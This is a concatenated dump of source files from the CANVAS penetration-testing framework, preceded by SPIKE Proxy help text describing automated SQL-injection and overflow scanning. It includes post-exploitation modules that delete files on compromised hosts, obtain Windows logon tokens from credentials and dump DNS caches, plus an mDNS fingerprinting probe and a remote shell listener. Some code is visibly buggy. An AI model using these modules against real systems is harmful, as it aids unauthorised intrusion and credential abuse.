11 | 12 | This is basically a nice little interface into SPIKE Proxy 1.1. To use it, you eithar click through the heirarchy of the requests (located to the right of the main window) or you click on request cache. You will see something like this:
13 | POST3592989045638HTTPA1.12001870221480374626616159141244082612_loginnet.passport.com
14 | Print Request Info, rewrite request, Display Response, crawl, argscan, dirscan, overflow 15 |

16 | 17 | 18 | That is a "request" (a POST to passport.com, in fact) which you can then resubmit. If you make multiple unique requests to a particular URL, they will each be stored . Requests that are exactly alike are discarded.

19 | If you want to resubmit this request, click on "rewrite request".

20 | If you just want to see information about this request, click "print request info". Simple, eh? 21 |

22 | Clicking Display Reponse will show you what the server responded with. Clicking "crawl" will currently display a "Not Implemented" error message. Clicking argscan or overflow will attempt to SQL inject or overflow any arguments SPIKE Proxy recognized. If it detects any interesting error messages, that request will be saved off and logged. 23 |

24 | One fun thing to do is browse your entire site, then go to the top level and click "argscan" which will then recurse through your entire site and look for ODBC errors. Fun, huh? 25 |

26 | 27 | If you have any other questions, e-mail the author at dave@immunitysec.com 28 | 29 | 30 | 31 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/unlink/unlink.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2004 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if "." not in sys.path: 10 | sys.path.append(".") 11 | 12 | import os,getopt 13 | import socket 14 | from exploitutils import * 15 | 16 | from canvasexploit import canvasexploit 17 | import canvasengine 18 | import time 19 | 20 | NAME = "CANVAS Unlink" 21 | DESCRIPTION = "CANVAS Unlink" 22 | DOCUMENTATION = {} 23 | VERSION = "1.0" 24 | PROPERTY = {} 25 | PROPERTY['TYPE'] = "Commands" 26 | PROPERTY['SITE'] = "Local" 27 | 28 | class theexploit(canvasexploit): 29 | def __init__(self): 30 | canvasexploit.__init__(self) 31 | self.result = "" 32 | self.name = NAME 33 | self.filename = "/doesnotexist" 34 | return 35 | 36 | def run(self): 37 | self.setInfo("%s (in progress)" % (NAME)) 38 | 39 | self.filename = self.argsDict.get("filename", self.filename) 40 | 41 | for node in self.argsDict["passednodes"]: 42 | 43 | if node.nodetype == "UnixShellNode": 44 | self.result = node.runcommand("rm %" % self.filename) 45 | 46 | elif node.nodetype in ["win32Node", "linuxNode", "bsdNode"]: 47 | self.result = node.unlink(self.filename) 48 | self.log("Unlink result: %s" % self.result) 49 | 50 | elif node.nodetype == "localNode": 51 | self.result = os.unlink(self.filename) 52 | 53 | else: 54 | self.log("%s node type not supported" % node.nodetype) 55 | 56 | self.setInfo("%s - done (success: %s)" % (NAME, self.result)) 57 | return 1 58 | 59 | if __name__ == '__main__': 60 | print "Cannot be called from the commandline" 61 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/osdetection/mdns.py: -------------------------------------------------------------------------------- 1 | from exploitutils import * 2 | import libs.canvasos as canvasos 3 | 4 | class mdnsdetect: 5 | def __init__(self): 6 | return 7 | 8 | def run_mdnsdetect(self): 9 | result = None 10 | 11 | sck = self.getudpsock() 12 | try: 13 | sck.connect((self.host, 5353)) 14 | except: 15 | return None 16 | 17 | buf = intel_short(random.randint(0,65535)) #transaction ID 18 | buf += intel_short(1) #flags (standard) 19 | buf += halfword2bstr(1) #questions 1 20 | buf += halfword2bstr(0) #Answer RRs 21 | buf += halfword2bstr(0) #authority RRs 22 | buf += halfword2bstr(0) #additional RRs 23 | 24 | #Query, name: 25 | for a in ["_workstation","_tcp","local"]: 26 | buf += chr(len(a))+a 27 | buf += "\x00" #end string 28 | buf += halfword2bstr(0xc) #Type: PTR 29 | buf += halfword2bstr(1) #class ANY 30 | 31 | sck.send(buf) 32 | 33 | try: 34 | data = sck.recv(1000) 35 | except: 36 | data="" 37 | self.log("MDNS DETECT: Got no Rendezvous data, socket closed or did not respond within 5 seconds") 38 | if data: 39 | self.log("MDNS DETECT: Got Rendezvous data: %s"%prettyprint(data)) 40 | for osd in [ "ubuntu", "fedora", "debian", "linux"]: 41 | if osd in data.lower(): 42 | self.log("MDNS DETECT: Found linux via mdns") 43 | result = canvasos.new("Linux") 44 | if osd != "linux": 45 | #not a generic signature 46 | result.family = osd 47 | return result 48 | 49 | self.log("MDNS DETECT: Found data (%r), but not sure what kind of box"%data) 50 | return None 51 | 52 | return result -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/POSIX.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | class POSIX: 9 | 10 | # 11 | 12 | SIGHUP = 1 13 | SIGQUIT = 3 14 | SIGTRAP = 5 15 | SIGKILL = 9 16 | SIGUSR1 = 10 17 | SIGUSR2 = 12 18 | SIGPIPE = 13 19 | SIGALRM = 14 20 | SIGCHLD = 17 21 | SIGCONT = 18 22 | SIGSTOP = 20 23 | 24 | # 25 | 26 | S_IXOTH = 00001 27 | S_IWOTH = 00002 28 | S_IROTH = 00004 29 | S_IRWXO = 00007 30 | S_IXGRP = 00010 31 | S_IWGRP = 00020 32 | S_IRGRP = 00040 33 | S_IRWXG = 00070 34 | S_IXUSR = 00100 35 | S_IWUSR = 00200 36 | S_IRUSR = 00400 37 | S_IRWXU = 00700 38 | 39 | # POSIX 1003.1 of 1990 40 | # XXX you should verify your OS includes before using those 41 | 42 | EPERM = 1 43 | ENOENT = 2 44 | ESRCH = 3 45 | EINTR = 4 46 | EIO = 5 47 | ENXIO = 6 48 | E2BIG = 7 49 | ENOEXEC = 8 50 | EBADF = 9 51 | ECHILD = 10 52 | EDEADLK = 11 53 | ENOMEM = 12 54 | EACCES = 13 55 | EFAULT = 14 56 | EBUSY = 16 57 | EEXIST = 17 58 | EXDEV = 18 59 | ENODEV = 19 60 | ENOTDIR = 20 61 | EISDIR = 21 62 | EINVAL = 22 63 | ENFILE = 23 64 | EMFILE = 24 65 | ENOTTY = 25 66 | EFBIG = 27 67 | ENOSPC = 28 68 | ESPIPE = 29 69 | EROFS = 30 70 | EMLINK = 31 71 | EPIPE = 32 72 | EDOM = 33 # C89 Standard 73 | ERANGE = 34 # C89 Standard 74 | EAGAIN = 35 75 | 76 | # 77 | 78 | STDIN_FILENO = 0 #i'm not sure it's really POSIX 79 | STDOUT_FILENO = 1 80 | STDERR_FILENO = 2 81 | 82 | def __init__(self): 83 | pass 84 | 85 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/solarisremoteresolver.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | the solaris remote resolver. A kind of combination of libc and a few other things... 5 | 6 | TODO: 7 | 8 | Either completely remove this file by refactoring in some way or convert all 9 | assembly into MOSDEF-C or (most likely option) convert the assembly that is 10 | sparc into x86/MOSDEF-C when self.arch=="X86" 11 | 12 | """ 13 | 14 | from remoteresolver import remoteresolver 15 | import threading 16 | 17 | class solarisremoteresolver(remoteresolver): 18 | 19 | def __init__(self, proc, version): 20 | remoteresolver.__init__(self, 'Solaris', proc, version) 21 | self.compilelock=threading.RLock() 22 | self.localcache={} 23 | 24 | def initLocalFunctions(self): 25 | print "XXX: moved all remote resolver local function inits to MOSDEF/MOSDEFLibc/Solaris.py !!!" 26 | print "XXX: don't need this call to initLocalFunctions ... (platform)" 27 | 28 | class sparcsolarisremoteresolver(solarisremoteresolver): 29 | def __init__(self, proc = "sparc", version = "2.7"): 30 | solarisremoteresolver.__init__(self, proc, version) 31 | solarisremoteresolver.initLocalFunctions(self) 32 | 33 | def initLocalFunctions(self): 34 | print "XXX: moved all remote resolver local function inits to MOSDEF/MOSDEFLibc/Solaris.py !!!" 35 | print "XXX: don't need this call to initLocalFunctions ... (sparc)" 36 | 37 | class x86solarisremoteresolver(solarisremoteresolver): 38 | def __init__(self, proc = "x86", version = "2.10"): 39 | solarisremoteresolver.__init__(self, proc, version) 40 | solarisremoteresolver.initLocalFunctions(self) 41 | 42 | def initLocalFunctions(self): 43 | print "XXX: moved all remote resolver local function inits to MOSDEF/MOSDEFLibc/Solaris.py !!!" 44 | print "XXX: don't need this call to initLocalFunctions ... (intel)" 45 | 46 | x86solarisremoteresolver 47 | 48 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/LogonUser/LogonUser.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | 10 | #covers both angles 11 | if "." not in sys.path: 12 | sys.path.append(".") 13 | 14 | import os,getopt 15 | import socket 16 | import time 17 | 18 | from exploitutils import * 19 | from canvasexploit import canvasexploit 20 | import canvasengine 21 | from shelllistener import * 22 | 23 | NAME = "LogonUser" 24 | DESCRIPTION = "Gets a primary token given a username and password" 25 | DOCUMENTATION = {} 26 | VERSION = "1.0" 27 | 28 | PROPERTY = {} 29 | PROPERTY['TYPE'] = "Commands" 30 | PROPERTY['SITE'] = "Local" 31 | PROPERTY['ARCH'] = [ ["Windows"] ] 32 | 33 | class theexploit(canvasexploit): 34 | def __init__(self): 35 | canvasexploit.__init__(self) 36 | self.name = NAME 37 | self.username = "" 38 | self.password = "" 39 | return 40 | 41 | def getargs(self): 42 | self.getarg("username") 43 | self.getarg("password") 44 | return 45 | 46 | def run(self): 47 | self.setInfo("%s (in progress)"%(NAME)) 48 | 49 | self.getargs() 50 | 51 | node = self.argsDict["passednodes"][0] 52 | 53 | if "win32api" in node.capabilities: 54 | ret,err,phToken = node.shell.LogonUser(self.username, self.password) 55 | 56 | if ret == 0: 57 | self.log("LogonUser Failed! (ERROR: %X)" % err) 58 | return 0 59 | else: 60 | self.log("LogonUser Worked! (TOKEN: %X)" % phToken) 61 | 62 | self.setInfo("%s (finished)" % (NAME)) 63 | return 1 64 | 65 | if __name__=="__main__": 66 | print "This win32 local module is meant to be run only within CANVAS" 67 | 68 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/MOSDEF/MOSDEFlibc/IRIX.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2006 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | from UNIX import UNIX 9 | 10 | class IRIX(UNIX): # IRIX is Unix System III 11 | 12 | # 13 | 14 | O_RDONLY = 0 15 | O_WRONLY = 1 16 | O_RDWR = 2 17 | O_NDELAY = 0x04 18 | O_APPEND = 0x08 19 | O_NONBLOCK = 0x80 20 | O_LARGEFILE = 0x2000 21 | 22 | O_CREAT = 0x100 23 | O_TRUNC = 0x200 24 | O_EXCL = 0x400 25 | O_NOCTTY = 0x800 26 | 27 | F_DUPFD = 0 28 | F_GETFD = 1 29 | F_SETFD = 2 30 | F_GETFL = 3 31 | F_SETFL = 4 32 | 33 | # 34 | 35 | SOCK_DGRAM = 1 36 | SOCK_STREAM = 2 37 | SOCK_RAW = 4 38 | 39 | SO_DEBUG = 0x0001 40 | SO_REUSEADDR = 0x0004 41 | SO_KEEPALIVE = 0x0008 42 | SO_LINGER = 0x0080 43 | SO_ERROR = 0x1007 44 | SO_TYPE = 0x1008 45 | 46 | SOL_SOCKET = 0xffff 47 | 48 | AF_LOCAL = 1 49 | AF_UNIX = AF_LOCAL 50 | AF_INET = 2 51 | AF_INET6 = 24 52 | 53 | PF_LOCAL = AF_LOCAL 54 | PF_UNIX = PF_LOCAL 55 | PF_INET = AF_INET 56 | PF_INET6 = AF_INET6 57 | 58 | MSG_OOB = 0x1 59 | MSG_PEEK = 0x2 60 | 61 | SHUT_RD = 0 62 | SHUT_WR = 1 63 | SHUT_RDWR = 2 64 | 65 | # 66 | 67 | SIGKILL = 9 68 | SIGBUS = 10 69 | SIGUSR1 = 16 70 | SIGUSR2 = 17 71 | SIGCLD = 18 72 | SIGCHLD = SIGCLD 73 | SIGSTOP = 23 74 | SIGCONT = 25 75 | 76 | SIG_ERR = -1 77 | SIG_IGN = 1 78 | SIG_DFL = 0 79 | 80 | def __init__(self, *args): 81 | UNIX.__init__(self) 82 | 83 | class IRIX_mips(IRIX): 84 | 85 | Endianness = 'big' 86 | 87 | def __init__(self, version = None): 88 | self.version = version 89 | IRIX.__init__(self) 90 | 91 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/exploits/get_dnscache/get_dnscache.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Proprietary CANVAS source code - use only under the license agreement 4 | #specified in LICENSE.txt in your CANVAS distribution 5 | #Copyright Immunity, Inc, 2002-2008 6 | #http://www.immunityinc.com/CANVAS/ for more information 7 | 8 | import sys 9 | if "." not in sys.path: 10 | sys.path.append(".") 11 | 12 | from exploitutils import * 13 | from canvasexploit import canvasexploit 14 | 15 | NAME = "Get DNS Cache" 16 | VERSION = "1.0" 17 | DESCRIPTION = "Grab the local DNS cache from the compromised host, useful for backtracking any old queries." 18 | 19 | DOCUMENTATION = {} 20 | 21 | PROPERTY = {} 22 | PROPERTY['TYPE'] = "Commands" 23 | PROPERTY['SITE'] = "Local" 24 | PROPERTY['ARCH'] = [ ["Windows"] ] 25 | 26 | class theexploit(canvasexploit): 27 | def __init__(self): 28 | canvasexploit.__init__(self) 29 | self.result = "" 30 | self.name = NAME 31 | return 32 | 33 | def run(self): 34 | self.setInfo("%s (in progress)" % (NAME)) 35 | 36 | node = self.argsDict["passednodes"][0] 37 | self.result = [] 38 | 39 | for node in self.argsDict["passednodes"]: 40 | 41 | nodetype = node.nodetype 42 | capabilities = node.capabilities 43 | 44 | if node.nodetype in ["win32Node"]: 45 | command = "ipconfig /displaydns" 46 | output = node.runcommand( command ) 47 | self.log("DNS Cache Values: %s" % output) 48 | ret = 1 49 | else: 50 | self.log("The node named %s of type %s does not have the capabilities needed to run this command"%(node.get_name(),nodetype)) 51 | self.result += [0] 52 | ret = 0 53 | 54 | self.dispshellcmd = self.command 55 | self.setInfo("%s - (finished)" % (NAME)) 56 | return ret 57 | 58 | -------------------------------------------------------------------------------- /CANVAS_HTSRL/Nodes/JavaShellServer.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | """ 4 | CANVAS Scripting shell server for Scripting languages like PHP and Python and whatnot 5 | """ 6 | 7 | #Proprietary CANVAS source code - use only under the license agreement 8 | #specified in LICENSE.txt in your CANVAS distribution 9 | #Copyright Immunity, Inc, 2002-2006 10 | #http://www.immunityinc.com/CANVAS/ for more information 11 | 12 | 13 | from shellserver import shellserver 14 | from exploitutils import * 15 | import time 16 | import os 17 | import socket 18 | from Nodes.javalistener import javalistener 19 | 20 | class javashellserver( javalistener): 21 | """ 22 | PHP Shell Listener 23 | """ 24 | 25 | def __init__(self,connection,node,logfunction=None): 26 | #shellserver.__init__(self,connection,node,type="Active",logfunction=logfunction) 27 | self.arch="Java" 28 | self.order=intel_order 29 | self.unorder=istr2int 30 | self.connection=connection 31 | self.node=node 32 | self.node.shell=self 33 | self.started= 0 34 | self.logfunction = logfunction 35 | self.engine=node.engine 36 | return 37 | 38 | def startup(self): 39 | """ 40 | Start this process... 41 | """ 42 | if self.started: 43 | return 44 | self.log("Startup Java Shell Server...") 45 | self.started=1 46 | javalistener.__init__(self,self.connection,logfunction=self.logfunction) 47 | javalistener.startup(self) 48 | #print self.node.shell 49 | self.log("Set up shell listener") 50 | #ok, now our mainloop code is running over on the other side 51 | self.log("Set up Java shell server") 52 | #self.sendrequest(mainloop) 53 | self.node.getInfo() 54 | return 1 55 | 56 | def close(self): 57 | if self.connection != None: 58 | self.connection.close() 59 | self.connection = None 60 | --------------------------------------------------------------------------------